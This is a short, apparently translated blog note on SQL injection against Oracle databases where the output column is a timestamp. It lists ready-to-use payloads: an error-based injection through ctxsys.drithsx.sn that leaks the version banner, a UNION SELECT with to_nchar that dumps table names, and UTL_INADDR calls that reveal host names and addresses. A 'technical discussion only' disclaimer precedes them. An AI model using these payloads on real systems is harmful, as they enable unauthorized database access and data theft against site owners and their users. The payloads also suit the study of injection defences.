For penetration testing methods where the output point is a timestamp (take Oracle database as an example)

Note: For technical discussion only, do not use for other purposes, all consequences have nothing to do with me.

Workaround:

1. Blinds

2. Try error injection

and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))

3. Try to convert type

to_nchar is converted to varchar or varchar2 type

Usage to_nchar(table_name)

and 1=2 union select null,null,to_nchar(table_name),null from user_tables

4. Convert characters to numbers through functions

Cut the string, turn the number to see the echo

Due to the word count requirement, I looked at some other error reporting functions

1.UTL_INADDR.get_host_address environment IP address

Specific usage: select UTL_INADDR.get_host_address('www.qq.com') from dual;

2.UTL_INADDR.get_host_name returns the hostname in the environment

Specific usage:

Returns the hostname of the specified IP address in the LAN

select UTL_INADDR.get_host_name('192.168.0.156') from dual;

Returns the URL of the specified IP address in intrenet

select UTL_INADDR.get_host_name('219.153.50.84') from dual;

You can view related contentOracle fault injectionFunction_Brother Xiaoming's technical blog_51CTO Blog